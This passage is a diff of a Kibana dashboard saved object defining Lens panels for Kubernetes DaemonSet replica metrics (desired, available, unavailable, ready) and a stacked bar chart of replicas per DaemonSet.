kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "d115572d-c1ae-4402-bd61-7f6aca621b17", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "e3bc5ca2-71af-4901-ae1c-82e383f83ae9": { - "columnOrder": [ - "859d3534-c923-4005-a84a-158f079f7e62", - "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" - ], - "columns": { - "859d3534-c923-4005-a84a-158f079f7e62": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "e115f6a2-0a07-4712-ab16-e6bce3f17b2c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.desired\": *" - }, - "isBucketed": false, - "label": "Replicas Available ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.desired" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "d115572d-c1ae-4402-bd61-7f6aca621b17", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "859d3534-c923-4005-a84a-158f079f7e62", - "collapseFn": "sum", - "layerId": "e3bc5ca2-71af-4901-ae1c-82e383f83ae9", - "layerType": "data", - "metricAccessor": "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" }, - "title": "DaemonSet Replicas Desired [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "e115f6a2-0a07-4712-ab16-e6bce3f17b2c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.desired\": *" + }, + "isBucketed": false, + "label": "Replicas Available ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.desired" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", - "w": 12, - "x": 0, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d115572d-c1ae-4402-bd61-7f6aca621b17", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "859d3534-c923-4005-a84a-158f079f7e62", + "collapseFn": "sum", + "layerId": "e3bc5ca2-71af-4901-ae1c-82e383f83ae9", + "layerType": "data", + "metricAccessor": "e115f6a2-0a07-4712-ab16-e6bce3f17b2c" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", - "type": "index-pattern" + "title": "DaemonSet Replicas Desired [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", + "w": 12, + "x": 0, + "y": 4 + }, + "panelIndex": "74f075ae-ea3e-40aa-a84c-2538a2195f6a", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-65cba563-57d3-468a-93b9-f22de872b5ff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "65cba563-57d3-468a-93b9-f22de872b5ff": { + "columnOrder": [ + "333417c9-f6ca-4afe-837c-f96891f37780", + "2318a210-3ab1-434b-8c1a-231a81856418" + ], + "columns": { + "2318a210-3ab1-434b-8c1a-231a81856418": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.available\": *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.available" + }, + "333417c9-f6ca-4afe-837c-f96891f37780": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "65cba563-57d3-468a-93b9-f22de872b5ff": { - "columnOrder": [ - "333417c9-f6ca-4afe-837c-f96891f37780", - "2318a210-3ab1-434b-8c1a-231a81856418" - ], - "columns": { - "2318a210-3ab1-434b-8c1a-231a81856418": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.available\": *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.available" - }, - "333417c9-f6ca-4afe-837c-f96891f37780": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "333417c9-f6ca-4afe-837c-f96891f37780", - "collapseFn": "sum", - "layerId": "65cba563-57d3-468a-93b9-f22de872b5ff", - "layerType": "data", - "metricAccessor": "2318a210-3ab1-434b-8c1a-231a81856418" - } - }, - "title": "DaemonSet Replicas Available [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "2f904623-cc34-4a48-afce-46fff964dbdf", - "w": 12, - "x": 12, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "2f904623-cc34-4a48-afce-46fff964dbdf", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "9cc3aefb-f6ee-47ca-8e8b-a5e5e9f46a6a", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "333417c9-f6ca-4afe-837c-f96891f37780", + "collapseFn": "sum", + "layerId": "65cba563-57d3-468a-93b9-f22de872b5ff", + "layerType": "data", + "metricAccessor": "2318a210-3ab1-434b-8c1a-231a81856418" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", - "type": "index-pattern" + "title": "DaemonSet Replicas Available [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "2f904623-cc34-4a48-afce-46fff964dbdf", + "w": 12, + "x": 12, + "y": 4 + }, + "panelIndex": "2f904623-cc34-4a48-afce-46fff964dbdf", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb896fbb-5e73-4bb9-922d-922562b1e71f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "bb896fbb-5e73-4bb9-922d-922562b1e71f": { + "columnOrder": [ + "edebd4ce-012f-4677-ab82-cdb1e495c9b5", + "33e722b3-a080-438a-a3d9-83f6da23009a" + ], + "columns": { + "33e722b3-a080-438a-a3d9-83f6da23009a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.unavailable\": *" + }, + "isBucketed": false, + "label": "Replicas Unavailable ", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.unavailable" + }, + "edebd4ce-012f-4677-ab82-cdb1e495c9b5": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "bb896fbb-5e73-4bb9-922d-922562b1e71f": { - "columnOrder": [ - "edebd4ce-012f-4677-ab82-cdb1e495c9b5", - "33e722b3-a080-438a-a3d9-83f6da23009a" - ], - "columns": { - "33e722b3-a080-438a-a3d9-83f6da23009a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.unavailable\": *" - }, - "isBucketed": false, - "label": "Replicas Unavailable ", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.unavailable" - }, - "edebd4ce-012f-4677-ab82-cdb1e495c9b5": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "edebd4ce-012f-4677-ab82-cdb1e495c9b5", - "collapseFn": "sum", - "layerId": "bb896fbb-5e73-4bb9-922d-922562b1e71f", - "layerType": "data", - "metricAccessor": "33e722b3-a080-438a-a3d9-83f6da23009a" - } - }, - "title": "DaemonSet Replicas Unavailable [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "e39b7173-1acf-4b60-9500-caa97eb5fabb", - "w": 12, - "x": 24, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "e39b7173-1acf-4b60-9500-caa97eb5fabb", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "1aacb9a8-18b0-46cb-a522-1cfac61e09ef", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "edebd4ce-012f-4677-ab82-cdb1e495c9b5", + "collapseFn": "sum", + "layerId": "bb896fbb-5e73-4bb9-922d-922562b1e71f", + "layerType": "data", + "metricAccessor": "33e722b3-a080-438a-a3d9-83f6da23009a" + } }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "type": "index-pattern" + "title": "DaemonSet Replicas Unavailable [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "e39b7173-1acf-4b60-9500-caa97eb5fabb", + "w": 12, + "x": 24, + "y": 4 + }, + "panelIndex": "e39b7173-1acf-4b60-9500-caa97eb5fabb", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "29b0a3c9-8a78-4a42-bc09-60671675e57c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "54d4cb18-d411-4a9b-a241-8ecc1f2efddd": { + "columnOrder": [ + "515a5062-e737-46a4-a456-257440ce7eb3", + "71fe8682-2b23-416c-973f-ae5f63658dc3" + ], + "columns": { + "515a5062-e737-46a4-a456-257440ce7eb3": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "29b0a3c9-8a78-4a42-bc09-60671675e57c", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "54d4cb18-d411-4a9b-a241-8ecc1f2efddd": { - "columnOrder": [ - "515a5062-e737-46a4-a456-257440ce7eb3", - "71fe8682-2b23-416c-973f-ae5f63658dc3" - ], - "columns": { - "515a5062-e737-46a4-a456-257440ce7eb3": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.daemonset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "71fe8682-2b23-416c-973f-ae5f63658dc3": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.daemonset.replicas.ready\": *" - }, - "isBucketed": false, - "label": "Replicas Ready", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.ready" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "29b0a3c9-8a78-4a42-bc09-60671675e57c", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "515a5062-e737-46a4-a456-257440ce7eb3", - "collapseFn": "sum", - "layerId": "54d4cb18-d411-4a9b-a241-8ecc1f2efddd", - "layerType": "data", - "metricAccessor": "71fe8682-2b23-416c-973f-ae5f63658dc3" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" }, - "title": "DaemonSet Replicas Ready [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "71fe8682-2b23-416c-973f-ae5f63658dc3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.daemonset.replicas.ready\": *" + }, + "isBucketed": false, + "label": "Replicas Ready", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.ready" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "08341473-695b-44de-8faa-8ca14a6031e1", - "w": 12, - "x": 36, - "y": 4 + "indexpattern": { + "layers": {} }, - "panelIndex": "08341473-695b-44de-8faa-8ca14a6031e1", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "29b0a3c9-8a78-4a42-bc09-60671675e57c", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "515a5062-e737-46a4-a456-257440ce7eb3", + "collapseFn": "sum", + "layerId": "54d4cb18-d411-4a9b-a241-8ecc1f2efddd", + "layerType": "data", + "metricAccessor": "71fe8682-2b23-416c-973f-ae5f63658dc3" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1ecf2434-25f0-454c-94cd-67a09297f08f", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "14c12ba0-f1aa-48ac-98c4-111594e9244c": { - "columnOrder": [ - "3f5990a9-a37a-429c-879c-8f4361fdb541", - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "34892916-522d-4b2e-b286-a534475b34a1", - "431b1111-09a2-4c06-8a86-c345ea80f6ed" - ], - "columns": { - "34892916-522d-4b2e-b286-a534475b34a1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Replicas Desired", - "operationType": "median", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.desired" - }, - "3f5990a9-a37a-429c-879c-8f4361fdb541": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "DaemonSet Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 20 - }, - "scale": "ordinal", - "sourceField": "kubernetes.daemonset.name" - }, - "431b1111-09a2-4c06-8a86-c345ea80f6ed": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.daemonset.replicas.unavailable: *" - }, - "isBucketed": false, - "label": "Replicas Unavailable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.unavailable" - }, - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.daemonset.replicas.available: *" - }, - "isBucketed": false, - "label": "Replicas Available", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.daemonset.replicas.available" - } - }, - "incompleteColumns": {} - } - } - } + "title": "DaemonSet Replicas Ready [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "08341473-695b-44de-8faa-8ca14a6031e1", + "w": 12, + "x": 36, + "y": 4 + }, + "panelIndex": "08341473-695b-44de-8faa-8ca14a6031e1", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-14c12ba0-f1aa-48ac-98c4-111594e9244c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1ecf2434-25f0-454c-94cd-67a09297f08f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "14c12ba0-f1aa-48ac-98c4-111594e9244c": { + "columnOrder": [ + "3f5990a9-a37a-429c-879c-8f4361fdb541", + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "34892916-522d-4b2e-b286-a534475b34a1", + "431b1111-09a2-4c06-8a86-c345ea80f6ed" + ], + "columns": { + "34892916-522d-4b2e-b286-a534475b34a1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Replicas Desired", + "operationType": "median", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.desired" + }, + "3f5990a9-a37a-429c-879c-8f4361fdb541": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "DaemonSet Name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1ecf2434-25f0-454c-94cd-67a09297f08f", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_daemonset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_daemonset" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "layers": [ - { - "accessors": [ - "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", - "34892916-522d-4b2e-b286-a534475b34a1", - "431b1111-09a2-4c06-8a86-c345ea80f6ed" - ], - "layerId": "14c12ba0-f1aa-48ac-98c4-111594e9244c", - "layerType": "data", - "position": "top", - "seriesType": "bar_stacked", - "showGridlines": false, - "xAccessor": "3f5990a9-a37a-429c-879c-8f4361fdb541", - "yConfig": [ - { - "color": "#dd0a50", - "forAccessor": "431b1111-09a2-4c06-8a86-c345ea80f6ed" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "right" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide" - } + "size": 20 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" + }, + "431b1111-09a2-4c06-8a86-c345ea80f6ed": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.daemonset.replicas.unavailable: *" + }, + "isBucketed": false, + "label": "Replicas Unavailable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.unavailable" }, - "title": "Replicas per DaemonSet [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsXY" + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.daemonset.replicas.available: *" + }, + "isBucketed": false, + "label": "Replicas Available", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.daemonset.replicas.available" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1ecf2434-25f0-454c-94cd-67a09297f08f", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": "aca3d51a-f0ea-4323-8a27-0f8fc1b122cd", - "w": 48, - "x": 0, - "y": 11 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "ad8b1756-1e89-403e-a4be-6bb918a3ae4c", + "34892916-522d-4b2e-b286-a534475b34a1", + "431b1111-09a2-4c06-8a86-c345ea80f6ed" + ], + "layerId": "14c12ba0-f1aa-48ac-98c4-111594e9244c", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "3f5990a9-a37a-429c-879c-8f4361fdb541", + "yConfig": [ + { + "color": "#dd0a50", + "forAccessor": "431b1111-09a2-4c06-8a86-c345ea80f6ed" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "right" }, - "panelIndex": 